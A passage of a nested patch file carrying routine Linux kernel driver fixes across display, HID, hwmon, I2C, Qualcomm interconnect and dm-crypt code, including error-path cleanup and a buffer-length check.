+ 			     DPSTREAMCLK0_EN,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index d0b46a3e01551..1a85509c12f23 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -1174,13 +1174,13 @@ unsigned int dcn32_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsign
+ 	if (is_dp_128b_132b_signal(pipe_ctx)) {
+ 		*k1_div = PIXEL_RATE_DIV_BY_1;
+ 		*k2_div = PIXEL_RATE_DIV_BY_1;
+-	} else if (dc_is_hdmi_tmds_signal(pipe_ctx->stream->signal) || dc_is_dvi_signal(pipe_ctx->stream->signal)) {
++	} else if (dc_is_hdmi_tmds_signal(stream->signal) || dc_is_dvi_signal(stream->signal)) {
+ 		*k1_div = PIXEL_RATE_DIV_BY_1;
+ 		if (stream->timing.pixel_encoding == PIXEL_ENCODING_YCBCR420)
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+ 		else
+ 			*k2_div = PIXEL_RATE_DIV_BY_4;
+-	} else if (dc_is_dp_signal(pipe_ctx->stream->signal)) {
++	} else if (dc_is_dp_signal(stream->signal)) {
+ 		if (two_pix_per_container) {
+ 			*k1_div = PIXEL_RATE_DIV_BY_1;
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 26fc5cad7a770..a942e2812183a 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -2142,6 +2142,7 @@ static bool dcn32_resource_construct(
+ 	dc->caps.edp_dsc_support = true;
+ 	dc->caps.extended_aux_timeout_support = true;
+ 	dc->caps.dmcub_support = true;
++	dc->caps.seamless_odm = true;
+ 
+ 	/* Color pipeline capabilities */
+ 	dc->caps.color.dpp.dcn_arch = 1;
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index a98efef0ba0e0..1b74a913f1b8f 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -659,8 +659,8 @@ static int lt8912_parse_dt(struct lt8912 *lt)
+ 
+ 	lt->hdmi_port = of_drm_find_bridge(port_node);
+ 	if (!lt->hdmi_port) {
+-		dev_err(lt->dev, "%s: Failed to get hdmi port\n", __func__);
+-		ret = -ENODEV;
++		ret = -EPROBE_DEFER;
++		dev_err_probe(lt->dev, ret, "%s: Failed to get hdmi port\n", __func__);
+ 		goto err_free_host_node;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 4bbb84847ecb7..e0d36edd1e3fb 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -5186,6 +5186,7 @@ intel_crtc_prepare_cleared_state(struct intel_atomic_state *state,
+ 	 * only fields that are know to not cause problems are preserved. */
+ 
+ 	saved_state->uapi = crtc_state->uapi;
++	saved_state->inherited = crtc_state->inherited;
+ 	saved_state->scaler_state = crtc_state->scaler_state;
+ 	saved_state->shared_dpll = crtc_state->shared_dpll;
+ 	saved_state->dpll_hw_state = crtc_state->dpll_hw_state;
+diff --git a/drivers/gpu/drm/i915/display/intel_fbdev.c b/drivers/gpu/drm/i915/display/intel_fbdev.c
+index 9899b5dcd291d..968915000519f 100644
+--- a/drivers/gpu/drm/i915/display/intel_fbdev.c
++++ b/drivers/gpu/drm/i915/display/intel_fbdev.c
+@@ -175,7 +175,7 @@ static int intelfb_alloc(struct drm_fb_helper *helper,
+ 	}
+ 
+ 	if (IS_ERR(obj)) {
+-		drm_err(&dev_priv->drm, "failed to allocate framebuffer\n");
++		drm_err(&dev_priv->drm, "failed to allocate framebuffer (%pe)\n", obj);
+ 		return PTR_ERR(obj);
+ 	}
+ 
+@@ -208,6 +208,7 @@ static int intelfb_create(struct drm_fb_helper *helper,
+ 	bool prealloc = false;
+ 	void __iomem *vaddr;
+ 	struct drm_i915_gem_object *obj;
++	struct i915_gem_ww_ctx ww;
+ 	int ret;
+ 
+ 	mutex_lock(&ifbdev->hpd_lock);
+@@ -256,7 +257,7 @@ static int intelfb_create(struct drm_fb_helper *helper,
+ 
+ 	info = drm_fb_helper_alloc_fbi(helper);
+ 	if (IS_ERR(info)) {
+-		drm_err(&dev_priv->drm, "Failed to allocate fb_info\n");
++		drm_err(&dev_priv->drm, "Failed to allocate fb_info (%pe)\n", info);
+ 		ret = PTR_ERR(info);
+ 		goto out_unpin;
+ 	}
+@@ -288,13 +289,24 @@ static int intelfb_create(struct drm_fb_helper *helper,
+ 		info->fix.smem_len = vma->size;
+ 	}
+ 
+-	vaddr = i915_vma_pin_iomap(vma);
+-	if (IS_ERR(vaddr)) {
+-		drm_err(&dev_priv->drm,
+-			"Failed to remap framebuffer into virtual memory\n");
+-		ret = PTR_ERR(vaddr);
+-		goto out_unpin;
++	for_i915_gem_ww(&ww, ret, false) {
++		ret = i915_gem_object_lock(vma->obj, &ww);
++
++		if (ret)
++			continue;
++
++		vaddr = i915_vma_pin_iomap(vma);
++		if (IS_ERR(vaddr)) {
++			drm_err(&dev_priv->drm,
++				"Failed to remap framebuffer into virtual memory (%pe)\n", vaddr);
++			ret = PTR_ERR(vaddr);
++			continue;
++		}
+ 	}
++
++	if (ret)
++		goto out_unpin;
++
+ 	info->screen_base = vaddr;
+ 	info->screen_size = vma->size;
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt.c b/drivers/gpu/drm/i915/gt/intel_gt.c
+index c7db49749a636..d12ec092e62df 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt.c
+@@ -691,12 +691,12 @@ int intel_gt_init(struct intel_gt *gt)
+ 	if (err)
+ 		goto err_gt;
+ 
+-	intel_uc_init_late(&gt->uc);
+-
+ 	err = i915_inject_probe_error(gt->i915, -EIO);
+ 	if (err)
+ 		goto err_gt;
+ 
++	intel_uc_init_late(&gt->uc);
++
+ 	intel_migrate_init(&gt->migrate, gt);
+ 
+ 	intel_pxp_init(&gt->pxp);
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+index 685ddccc0f26a..1e1fa20fb41c9 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+@@ -1491,7 +1491,7 @@ int intel_guc_capture_print_engine_node(struct drm_i915_error_state_buf *ebuf,
+ 
+ 	if (!ebuf || !ee)
+ 		return -EINVAL;
+-	cap = ee->capture;
++	cap = ee->guc_capture;
+ 	if (!cap || !ee->engine)
+ 		return -ENODEV;
+ 
+@@ -1556,13 +1556,34 @@ int intel_guc_capture_print_engine_node(struct drm_i915_error_state_buf *ebuf,
+ 
+ #endif //CONFIG_DRM_I915_CAPTURE_ERROR
+ 
++static void guc_capture_find_ecode(struct intel_engine_coredump *ee)
++{
++	struct gcap_reg_list_info *reginfo;
++	struct guc_mmio_reg *regs;
++	i915_reg_t reg_ipehr = RING_IPEHR(0);
++	i915_reg_t reg_instdone = RING_INSTDONE(0);
++	int i;
++
++	if (!ee->guc_capture_node)
++		return;
++
++	reginfo = ee->guc_capture_node->reginfo + GUC_CAPTURE_LIST_TYPE_ENGINE_INSTANCE;
++	regs = reginfo->regs;
++	for (i = 0; i < reginfo->num_regs; i++) {
++		if (regs[i].offset == reg_ipehr.reg)
++			ee->ipehr = regs[i].value;
++		else if (regs[i].offset == reg_instdone.reg)
++			ee->instdone.instdone = regs[i].value;
++	}
++}
++
+ void intel_guc_capture_free_node(struct intel_engine_coredump *ee)
+ {
+ 	if (!ee || !ee->guc_capture_node)
+ 		return;
+ 
+-	guc_capture_add_node_to_cachelist(ee->capture, ee->guc_capture_node);
+-	ee->capture = NULL;
++	guc_capture_add_node_to_cachelist(ee->guc_capture, ee->guc_capture_node);
++	ee->guc_capture = NULL;
+ 	ee->guc_capture_node = NULL;
+ }
+ 
+@@ -1596,7 +1617,8 @@ void intel_guc_capture_get_matching_node(struct intel_gt *gt,
+ 		    (ce->lrc.lrca & CTX_GTT_ADDRESS_MASK)) {
+ 			list_del(&n->link);
+ 			ee->guc_capture_node = n;
+-			ee->capture = guc->capture;
++			ee->guc_capture = guc->capture;
++			guc_capture_find_ecode(ee);
+ 			return;
+ 		}
+ 	}
+diff --git a/drivers/gpu/drm/i915/i915_active.c b/drivers/gpu/drm/i915/i915_active.c
+index a9fea115f2d26..8ef93889061a6 100644
+--- a/drivers/gpu/drm/i915/i915_active.c
++++ b/drivers/gpu/drm/i915/i915_active.c
+@@ -92,8 +92,7 @@ static void debug_active_init(struct i915_active *ref)
+ static void debug_active_activate(struct i915_active *ref)
+ {
+ 	lockdep_assert_held(&ref->tree_lock);
+-	if (!atomic_read(&ref->count)) /* before the first inc */
+-		debug_object_activate(ref, &active_debug_desc);
++	debug_object_activate(ref, &active_debug_desc);
+ }
+ 
+ static void debug_active_deactivate(struct i915_active *ref)
+diff --git a/drivers/gpu/drm/i915/i915_gpu_error.h b/drivers/gpu/drm/i915/i915_gpu_error.h
+index efc75cc2ffdb9..56027ffbce51f 100644
+--- a/drivers/gpu/drm/i915/i915_gpu_error.h
++++ b/drivers/gpu/drm/i915/i915_gpu_error.h
+@@ -94,7 +94,7 @@ struct intel_engine_coredump {
+ 	struct intel_instdone instdone;
+ 
+ 	/* GuC matched capture-lists info */
+-	struct intel_guc_state_capture *capture;
++	struct intel_guc_state_capture *guc_capture;
+ 	struct __guc_capture_parsed_output *guc_capture_node;
+ 
+ 	struct i915_gem_context_coredump {
+diff --git a/drivers/gpu/drm/meson/meson_drv.c b/drivers/gpu/drm/meson/meson_drv.c
+index 3b24a924b7b97..eea433ade79d0 100644
+--- a/drivers/gpu/drm/meson/meson_drv.c
++++ b/drivers/gpu/drm/meson/meson_drv.c
+@@ -325,23 +325,23 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 
+ 	ret = meson_encoder_hdmi_init(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_plane_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_overlay_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_crtc_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = request_irq(priv->vsync_irq, meson_irq, 0, drm->driver->name, drm);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	drm_mode_config_reset(drm);
+ 
+@@ -359,6 +359,9 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 
+ uninstall_irq:
+ 	free_irq(priv->vsync_irq, drm);
++unbind_all:
++	if (has_components)
++		component_unbind_all(drm->dev, drm);
+ exit_afbcd:
+ 	if (priv->afbcd.ops)
+ 		priv->afbcd.ops->exit(priv);
+diff --git a/drivers/gpu/drm/tiny/cirrus.c b/drivers/gpu/drm/tiny/cirrus.c
+index 354d5e854a6f0..b27e469e90217 100644
+--- a/drivers/gpu/drm/tiny/cirrus.c
++++ b/drivers/gpu/drm/tiny/cirrus.c
+@@ -455,7 +455,7 @@ static void cirrus_pipe_update(struct drm_simple_display_pipe *pipe,
+ 	if (state->fb && cirrus->cpp != cirrus_cpp(state->fb))
+ 		cirrus_mode_set(cirrus, &crtc->mode, state->fb);
+ 
+-	if (drm_atomic_helper_damage_merged(old_state, state, &rect))
++	if (state->fb && drm_atomic_helper_damage_merged(old_state, state, &rect))
+ 		cirrus_fb_blit_rect(state->fb, &shadow_plane_state->data[0], &rect);
+ }
+ 
+diff --git a/drivers/hid/hid-cp2112.c b/drivers/hid/hid-cp2112.c
+index 1e16b0fa310d1..27cadadda7c9d 100644
+--- a/drivers/hid/hid-cp2112.c
++++ b/drivers/hid/hid-cp2112.c
+@@ -1354,6 +1354,7 @@ static int cp2112_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	girq->parents = NULL;
+ 	girq->default_type = IRQ_TYPE_NONE;
+ 	girq->handler = handle_simple_irq;
++	girq->threaded = true;
+ 
+ 	ret = gpiochip_add_data(&dev->gc, dev);
+ 	if (ret < 0) {
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index fdb66dc065822..e906ee375298a 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4378,6 +4378,8 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb01e) },
+ 	{ /* MX Master 3 mouse over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb023) },
++	{ /* MX Master 3S mouse over Bluetooth */
++	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb034) },
+ 	{}
+ };
+ 
+diff --git a/drivers/hid/intel-ish-hid/ipc/ipc.c b/drivers/hid/intel-ish-hid/ipc/ipc.c
+index 15e14239af829..a49c6affd7c4c 100644
+--- a/drivers/hid/intel-ish-hid/ipc/ipc.c
++++ b/drivers/hid/intel-ish-hid/ipc/ipc.c
+@@ -5,6 +5,7 @@
+  * Copyright (c) 2014-2016, Intel Corporation.
+  */
+ 
++#include <linux/devm-helpers.h>
+ #include <linux/sched.h>
+ #include <linux/spinlock.h>
+ #include <linux/delay.h>
+@@ -621,7 +622,6 @@ static void	recv_ipc(struct ishtp_device *dev, uint32_t doorbell_val)
+ 	case MNG_RESET_NOTIFY:
+ 		if (!ishtp_dev) {
+ 			ishtp_dev = dev;
+-			INIT_WORK(&fw_reset_work, fw_reset_work_fn);
+ 		}
+ 		schedule_work(&fw_reset_work);
+ 		break;
+@@ -940,6 +940,7 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ {
+ 	struct ishtp_device *dev;
+ 	int	i;
++	int	ret;
+ 
+ 	dev = devm_kzalloc(&pdev->dev,
+ 			   sizeof(struct ishtp_device) + sizeof(struct ish_hw),
+@@ -975,6 +976,12 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ 		list_add_tail(&tx_buf->link, &dev->wr_free_list);
+ 	}
+ 
++	ret = devm_work_autocancel(&pdev->dev, &fw_reset_work, fw_reset_work_fn);
++	if (ret) {
++		dev_err(dev->devc, "Failed to initialise FW reset work\n");
++		return NULL;
++	}
++
+ 	dev->ops = &ish_hw_ops;
+ 	dev->devc = &pdev->dev;
+ 	dev->mtu = IPC_PAYLOAD_SIZE - sizeof(struct ishtp_msg_hdr);
+diff --git a/drivers/hwmon/hwmon.c b/drivers/hwmon/hwmon.c
+index 4218750d5a66b..9ed34b2e1f499 100644
+--- a/drivers/hwmon/hwmon.c
++++ b/drivers/hwmon/hwmon.c
+@@ -756,6 +756,7 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 	struct hwmon_device *hwdev;
+ 	const char *label;
+ 	struct device *hdev;
++	struct device *tdev = dev;
+ 	int i, err, id;
+ 
+ 	/* Complain about invalid characters in hwmon name attribute */
+@@ -825,7 +826,9 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 	hwdev->name = name;
+ 	hdev->class = &hwmon_class;
+ 	hdev->parent = dev;
+-	hdev->of_node = dev ? dev->of_node : NULL;
++	while (tdev && !tdev->of_node)
++		tdev = tdev->parent;
++	hdev->of_node = tdev ? tdev->of_node : NULL;
+ 	hwdev->chip = chip;
+ 	dev_set_drvdata(hdev, drvdata);
+ 	dev_set_name(hdev, HWMON_ID_FORMAT, id);
+@@ -837,7 +840,7 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 
+ 	INIT_LIST_HEAD(&hwdev->tzdata);
+ 
+-	if (dev && dev->of_node && chip && chip->ops->read &&
++	if (hdev->of_node && chip && chip->ops->read &&
+ 	    chip->info[0]->type == hwmon_chip &&
+ 	    (chip->info[0]->config[0] & HWMON_C_REGISTER_TZ)) {
+ 		err = hwmon_thermal_register_sensors(hdev);
+diff --git a/drivers/hwmon/it87.c b/drivers/hwmon/it87.c
+index 7bd154ba351b9..b45bd3aa5a653 100644
+--- a/drivers/hwmon/it87.c
++++ b/drivers/hwmon/it87.c
+@@ -486,6 +486,8 @@ static const struct it87_devices it87_devices[] = {
+ #define has_pwm_freq2(data)	((data)->features & FEAT_PWM_FREQ2)
+ #define has_six_temp(data)	((data)->features & FEAT_SIX_TEMP)
+ #define has_vin3_5v(data)	((data)->features & FEAT_VIN3_5V)
++#define has_scaling(data)	((data)->features & (FEAT_12MV_ADC | \
++						     FEAT_10_9MV_ADC))
+ 
+ struct it87_sio_data {
+ 	int sioaddr;
+@@ -3098,7 +3100,7 @@ static int it87_probe(struct platform_device *pdev)
+ 			 "Detected broken BIOS defaults, disabling PWM interface\n");
+ 
+ 	/* Starting with IT8721F, we handle scaling of internal voltages */
+-	if (has_12mv_adc(data)) {
++	if (has_scaling(data)) {
+ 		if (sio_data->internal & BIT(0))
+ 			data->in_scaled |= BIT(3);	/* in3 is AVCC */
+ 		if (sio_data->internal & BIT(1))
+diff --git a/drivers/i2c/busses/i2c-hisi.c b/drivers/i2c/busses/i2c-hisi.c
+index 76c3d8f6fc3c6..d30071f299879 100644
+--- a/drivers/i2c/busses/i2c-hisi.c
++++ b/drivers/i2c/busses/i2c-hisi.c
+@@ -339,7 +339,11 @@ static irqreturn_t hisi_i2c_irq(int irq, void *context)
+ 		hisi_i2c_read_rx_fifo(ctlr);
+ 
+ out:
+-	if (int_stat & HISI_I2C_INT_TRANS_CPLT || ctlr->xfer_err) {
++	/*
++	 * Only use TRANS_CPLT to indicate the completion. On error cases we'll
++	 * get two interrupts, INT_ERR first then TRANS_CPLT.
++	 */
++	if (int_stat & HISI_I2C_INT_TRANS_CPLT) {
+ 		hisi_i2c_disable_int(ctlr, HISI_I2C_INT_ALL);
+ 		hisi_i2c_clear_int(ctlr, HISI_I2C_INT_ALL);
+ 		complete(ctlr->completion);
+diff --git a/drivers/i2c/busses/i2c-imx-lpi2c.c b/drivers/i2c/busses/i2c-imx-lpi2c.c
+index 188f2a36d2fd6..9b2f9544c5681 100644
+--- a/drivers/i2c/busses/i2c-imx-lpi2c.c
++++ b/drivers/i2c/busses/i2c-imx-lpi2c.c
+@@ -503,10 +503,14 @@ disable:
+ static irqreturn_t lpi2c_imx_isr(int irq, void *dev_id)
+ {
+ 	struct lpi2c_imx_struct *lpi2c_imx = dev_id;
++	unsigned int enabled;
+ 	unsigned int temp;
+ 
++	enabled = readl(lpi2c_imx->base + LPI2C_MIER);
++
+ 	lpi2c_imx_intctrl(lpi2c_imx, 0);
+ 	temp = readl(lpi2c_imx->base + LPI2C_MSR);
++	temp &= enabled;
+ 
+ 	if (temp & MSR_RDF)
+ 		lpi2c_imx_read_rxfifo(lpi2c_imx);
+diff --git a/drivers/i2c/busses/i2c-mxs.c b/drivers/i2c/busses/i2c-mxs.c
+index d113bed795452..e0f3b3545cfe4 100644
+--- a/drivers/i2c/busses/i2c-mxs.c
++++ b/drivers/i2c/busses/i2c-mxs.c
+@@ -171,7 +171,7 @@ static void mxs_i2c_dma_irq_callback(void *param)
+ }
+ 
+ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+-			struct i2c_msg *msg, uint32_t flags)
++			struct i2c_msg *msg, u8 *buf, uint32_t flags)
+ {
+ 	struct dma_async_tx_descriptor *desc;
+ 	struct mxs_i2c_dev *i2c = i2c_get_adapdata(adap);
+@@ -226,7 +226,7 @@ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+ 		}
+ 
+ 		/* Queue the DMA data transfer. */
+-		sg_init_one(&i2c->sg_io[1], msg->buf, msg->len);
++		sg_init_one(&i2c->sg_io[1], buf, msg->len);
+ 		dma_map_sg(i2c->dev, &i2c->sg_io[1], 1, DMA_FROM_DEVICE);
+ 		desc = dmaengine_prep_slave_sg(i2c->dmach, &i2c->sg_io[1], 1,
+ 					DMA_DEV_TO_MEM,
+@@ -259,7 +259,7 @@ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+ 		/* Queue the DMA data transfer. */
+ 		sg_init_table(i2c->sg_io, 2);
+ 		sg_set_buf(&i2c->sg_io[0], &i2c->addr_data, 1);
+-		sg_set_buf(&i2c->sg_io[1], msg->buf, msg->len);
++		sg_set_buf(&i2c->sg_io[1], buf, msg->len);
+ 		dma_map_sg(i2c->dev, i2c->sg_io, 2, DMA_TO_DEVICE);
+ 		desc = dmaengine_prep_slave_sg(i2c->dmach, i2c->sg_io, 2,
+ 					DMA_MEM_TO_DEV,
+@@ -563,6 +563,7 @@ static int mxs_i2c_xfer_msg(struct i2c_adapter *adap, struct i2c_msg *msg,
+ 	struct mxs_i2c_dev *i2c = i2c_get_adapdata(adap);
+ 	int ret;
+ 	int flags;
++	u8 *dma_buf;
+ 	int use_pio = 0;
+ 	unsigned long time_left;
+ 
+@@ -588,13 +589,20 @@ static int mxs_i2c_xfer_msg(struct i2c_adapter *adap, struct i2c_msg *msg,
+ 		if (ret && (ret != -ENXIO))
+ 			mxs_i2c_reset(i2c);
+ 	} else {
++		dma_buf = i2c_get_dma_safe_msg_buf(msg, 1);
++		if (!dma_buf)
++			return -ENOMEM;
++
+ 		reinit_completion(&i2c->cmd_complete);
+-		ret = mxs_i2c_dma_setup_xfer(adap, msg, flags);
+-		if (ret)
++		ret = mxs_i2c_dma_setup_xfer(adap, msg, dma_buf, flags);
++		if (ret) {
++			i2c_put_dma_safe_msg_buf(dma_buf, msg, false);
+ 			return ret;
++		}
+ 
+ 		time_left = wait_for_completion_timeout(&i2c->cmd_complete,
+ 						msecs_to_jiffies(1000));
++		i2c_put_dma_safe_msg_buf(dma_buf, msg, true);
+ 		if (!time_left)
+ 			goto timeout;
+ 
+diff --git a/drivers/i2c/busses/i2c-xgene-slimpro.c b/drivers/i2c/busses/i2c-xgene-slimpro.c
+index 63259b3ea5abd..3538d36368a90 100644
+--- a/drivers/i2c/busses/i2c-xgene-slimpro.c
++++ b/drivers/i2c/busses/i2c-xgene-slimpro.c
+@@ -308,6 +308,9 @@ static int slimpro_i2c_blkwr(struct slimpro_i2c_dev *ctx, u32 chip,
+ 	u32 msg[3];
+ 	int rc;
+ 
++	if (writelen > I2C_SMBUS_BLOCK_MAX)
++		return -EINVAL;
++
+ 	memcpy(ctx->dma_buffer, data, writelen);
+ 	paddr = dma_map_single(ctx->dev, ctx->dma_buffer, writelen,
+ 			       DMA_TO_DEVICE);
+diff --git a/drivers/interconnect/qcom/osm-l3.c b/drivers/interconnect/qcom/osm-l3.c
+index 333adb21e7176..46b538e6c07b6 100644
+--- a/drivers/interconnect/qcom/osm-l3.c
++++ b/drivers/interconnect/qcom/osm-l3.c
+@@ -294,7 +294,7 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	qnodes = desc->nodes;
+ 	num_nodes = desc->num_nodes;
+ 
+-	data = devm_kcalloc(&pdev->dev, num_nodes, sizeof(*node), GFP_KERNEL);
++	data = devm_kzalloc(&pdev->dev, struct_size(data, nodes, num_nodes), GFP_KERNEL);
+ 	if (!data)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/interconnect/qcom/qcm2290.c b/drivers/interconnect/qcom/qcm2290.c
+index 0da612d6398c5..a29cdb4fac03f 100644
+--- a/drivers/interconnect/qcom/qcm2290.c
++++ b/drivers/interconnect/qcom/qcm2290.c
+@@ -147,9 +147,9 @@ static struct qcom_icc_node mas_snoc_bimc_nrt = {
+ 	.name = "mas_snoc_bimc_nrt",
+ 	.buswidth = 16,
+ 	.qos.ap_owned = true,
+-	.qos.qos_port = 2,
++	.qos.qos_port = 3,
+ 	.qos.qos_mode = NOC_QOS_MODE_BYPASS,
+-	.mas_rpm_id = 163,
++	.mas_rpm_id = 164,
+ 	.slv_rpm_id = -1,
+ 	.num_links = ARRAY_SIZE(mas_snoc_bimc_nrt_links),
+ 	.links = mas_snoc_bimc_nrt_links,
+diff --git a/drivers/interconnect/qcom/sm8450.c b/drivers/interconnect/qcom/sm8450.c
+index e3a12e3d6e061..2d7a8e7b85ec2 100644
+--- a/drivers/interconnect/qcom/sm8450.c
++++ b/drivers/interconnect/qcom/sm8450.c
+@@ -1844,100 +1844,6 @@ static const struct qcom_icc_desc sm8450_system_noc = {
+ 	.num_bcms = ARRAY_SIZE(system_noc_bcms),
+ };
+ 
+-static int qnoc_probe(struct platform_device *pdev)
+-{
+-	const struct qcom_icc_desc *desc;
+-	struct icc_onecell_data *data;
+-	struct icc_provider *provider;
+-	struct qcom_icc_node * const *qnodes;
+-	struct qcom_icc_provider *qp;
+-	struct icc_node *node;
+-	size_t num_nodes, i;
+-	int ret;
+-
+-	desc = device_get_match_data(&pdev->dev);
+-	if (!desc)
+-		return -EINVAL;
+-
+-	qnodes = desc->nodes;
+-	num_nodes = desc->num_nodes;
+-
+-	qp = devm_kzalloc(&pdev->dev, sizeof(*qp), GFP_KERNEL);
+-	if (!qp)
+-		return -ENOMEM;
+-
+-	data = devm_kcalloc(&pdev->dev, num_nodes, sizeof(*node), GFP_KERNEL);
+-	if (!data)
+-		return -ENOMEM;
+-
+-	provider = &qp->provider;
+-	provider->dev = &pdev->dev;
+-	provider->set = qcom_icc_set;
+-	provider->pre_aggregate = qcom_icc_pre_aggregate;
+-	provider->aggregate = qcom_icc_aggregate;
+-	provider->xlate_extended = qcom_icc_xlate_extended;
+-	INIT_LIST_HEAD(&provider->nodes);
+-	provider->data = data;
+-
+-	qp->dev = &pdev->dev;
+-	qp->bcms = desc->bcms;
+-	qp->num_bcms = desc->num_bcms;
+-
+-	qp->voter = of_bcm_voter_get(qp->dev, NULL);
+-	if (IS_ERR(qp->voter))
+-		return PTR_ERR(qp->voter);
+-
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(&pdev->dev, "error adding interconnect provider\n");
+-		return ret;
+-	}
+-
+-	for (i = 0; i < qp->num_bcms; i++)
+-		qcom_icc_bcm_init(qp->bcms[i], &pdev->dev);
+-
+-	for (i = 0; i < num_nodes; i++) {
+-		size_t j;
+-
+-		if (!qnodes[i])
+-			continue;
+-
+-		node = icc_node_create(qnodes[i]->id);
+-		if (IS_ERR(node)) {
+-			ret = PTR_ERR(node);
+-			goto err;
+-		}
+-
+-		node->name = qnodes[i]->name;
+-		node->data = qnodes[i];
+-		icc_node_add(node, provider);
+-
+-		for (j = 0; j < qnodes[i]->num_links; j++)
+-			icc_link_create(node, qnodes[i]->links[j]);
+-
+-		data->nodes[i] = node;
+-	}
+-	data->num_nodes = num_nodes;
+-
+-	platform_set_drvdata(pdev, qp);
+-
+-	return 0;
+-err:
+-	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+-	return ret;
+-}
+-
+-static int qnoc_remove(struct platform_device *pdev)
+-{
+-	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+-
+-	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+-
+-	return 0;
+-}
+-
+ static const struct of_device_id qnoc_of_match[] = {
+ 	{ .compatible = "qcom,sm8450-aggre1-noc",
+ 	  .data = &sm8450_aggre1_noc},
+@@ -1966,8 +1872,8 @@ static const struct of_device_id qnoc_of_match[] = {
+ MODULE_DEVICE_TABLE(of, qnoc_of_match);
+ 
+ static struct platform_driver qnoc_driver = {
+-	.probe = qnoc_probe,
+-	.remove = qnoc_remove,
++	.probe = qcom_icc_rpmh_probe,
++	.remove = qcom_icc_rpmh_remove,
+ 	.driver = {
+ 		.name = "qnoc-sm8450",
+ 		.of_match_table = qnoc_of_match,
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index 2653516bcdef5..dc2d0d61ade93 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -71,7 +71,9 @@ struct dm_crypt_io {
+ 	struct crypt_config *cc;
+ 	struct bio *base_bio;
+ 	u8 *integrity_metadata;
+-	bool integrity_metadata_from_pool;
++	bool integrity_metadata_from_pool:1;
++	bool in_tasklet:1;
++
+ 	struct work_struct work;
+ 	struct tasklet_struct tasklet;
+ 
+@@ -1728,6 +1730,7 @@ static void crypt_io_init(struct dm_crypt_io *io, struct crypt_config *cc,
+ 	io->ctx.r.req = NULL;
+ 	io->integrity_metadata = NULL;
+ 	io->integrity_metadata_from_pool = false;
++	io->in_tasklet = false;
+ 	atomic_set(&io->io_pending, 0);
+ }
+ 
+@@ -1773,14 +1776,13 @@ static void crypt_dec_pending(struct dm_crypt_io *io)
+ 	 * our tasklet. In this case we need to delay bio_endio()
+ 	 * execution to after the tasklet is done and dequeued.
+ 	 */
+-	if (tasklet_trylock(&io->tasklet)) {
+-		tasklet_unlock(&io->tasklet);
+-		bio_endio(base_bio);
++	if (io->in_tasklet) {
++		INIT_WORK(&io->work, kcryptd_io_bio_endio);
++		queue_work(cc->io_queue, &io->work);
+ 		return;
+ 	}
+ 
+-	INIT_WORK(&io->work, kcryptd_io_bio_endio);
